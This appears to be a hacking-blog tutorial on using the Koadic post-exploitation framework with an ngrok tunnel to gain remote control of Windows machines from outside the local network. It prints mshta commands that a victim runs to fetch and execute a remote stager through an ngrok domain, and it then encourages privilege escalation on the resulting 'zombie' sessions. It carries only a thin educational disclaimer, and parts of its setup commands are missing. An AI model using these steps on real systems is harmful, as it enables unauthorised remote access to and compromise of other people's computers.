In the previous post, I explained how to use metasploit and establish a reverse TCP connection from outside the LAN without port forwarding. So a lot of our readers asked about using ngrok with Koadic (well, most of the users around the world are still using Windows and Koadic is one of the best weapons against it).
Sponsor Link
This Project is Sponsored by UTSource. UTSource is a professional electronic components supplier.
What is Koadic?
Koadic is an awesom tool developed by zerosum0x0. This can help us in providing remote access to a machine with very less user interaction, have various modules that help us to perform enumeration, pivoting, and privilage escalation. The server-side component is developed in Python and the client part is written in JavaScript/Vb script.
Koadic is an awesome post exploitation tool that is more java script oriented than power shell. Even though most of the attack vectors are power shell based, the java script part is not checked by defense mechanisms. They also use Microsoft signed binaries to run their stagers which is really cool. most of the time.
Exploit Windows Outside LAN Using Koadic
In this post, we’ll discuss about attacking a windows 7 machine (also work on other versions including windows 10; as of now) using Koadic, to establish a session from a victim’s windows machine device to our local machine, without port forwarding.
Step 1 – Download and Setup Koadic
Koadic is available in github. You can easily download and set it up using the below commands.[AdSense-A]
Use the command ‘info’ for more details
Set the value of the SRVHOST (Server IP; also used as connect back IP), which is the IP address of the attackers machine and the SRVPORT (Port).
Now execute the command ‘run’
You will be provided with a command that is to be run with in the command prompt of the victims machine as shown in the screenshot.
Step 4 – Testing inside the LAN
Before going outside the LAN, it is always a good idea to test the set up within the LAN. Open the command prompt of the victims machine and enter the code we got from the previous step.
mshta http://10.9.3.50/UEv5M
If everything is done correctly, a new session will start with the victims machine as Zombie 0. You can do anything we want with that.
Step 5 – Set Up Ngrok
Now lets go one more step forward and run Koadic Outside LAN over the internet. ngrok enables connection establishment to a device or a service (such as SSH) running on a device, within a local network or located across the internet with out port forwarding. This will help us to connect our victims windows device to establish a session to our attacking device even when our machine is located with in a private Network.
Let us start by installing and setting up Ngrok in our Kali machine. For doing that, follow Step 1, 2 and 3 in the below tutorial. You could do a lot more using Ngrok.[AdSense-C]
This means that, all HTTP traffic for 61af7cd6.ngrok.io through the port 80 over the internet, will be redirected to port 9999 on our machine by the ngrok. Leave it running
Step 7 – Testing Koadic Outside LAN
This step is similar to Step 4, but we are going to do a slight change in the URL. This time, we are replacing the IP Address with the domain name of the ngrok URL.
So,
http://10.9.3.50:9999/UEv5M to http://61af7cd6.ngrok.io/UEv5M
So the command will be like
mshta http://61af7cd6.ngrok.io/UEv5M
Run this command in the Victim Machine.
Tadaaa!! You will get another session as Zombie 1. Thats it. Now you can easily escalate the privileges and play with you Zombies.[AdSense-B]
Disclaimer: This is for educational purposes only. Any actions and or activities related to the material contained within this Website is solely your responsibility.The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.
Kali Linux WiFi Adapter Recently Kali Linux 2020 was released which updated the world’s best penetration testing OS with some neat hardware support including some WiFi Adapters to play around with WiFi networks. Here is a list of Best WiFi Adapter For Kali Linux that are 100% compatible with Latest Kali Linux, that can go…
Information Security Consulting company TrustedSec has announced a HTTP(s) command and control (C2) Open Source Framework dubbed TrevorC2. This is a client-server model for masking out Command and Control using a normally browsable website. Detection of this much difficult because the time intervals are different and it does not use POST requests for data extraction….
Hacking is a mindset defined primarily by an adventurous spirit about how things work. It entails a readiness, even an eagerness to explore, learn, and experiment. Ethical hacking, also called penetration testing, is a process in which an individual attempt to compromise the security of a channel or system to identify a vulnerability or danger….
In the previous posts, I told you everything about BeEF, BeEF hook and showed how to create a malicious HTML game with BeEF hook script, port forwarding in router and how to setup NOIP Dynamic DNS Service in Kali Linux. Now let us combine everything and perform a real attack using BeEF outside the LAN…
WiFi and WPA Now a days, every offices, houses, hotels, parks, hospitals, almost everywhere there is wifi. But the real question is, are they secure?If your wireless access point is not properly secured, people from other houses, offices or nearby buildings can gain access to it. People who are able to connect to your wireless…
![Best Books to Learn Ethical Hacking 2021 [Easy Learning from Beginners to Advanced]](https://hackersgrid.com/wp-content/uploads/2021/06/Best-Books-to-Learn-Ethical-Hacking-768x432.png)
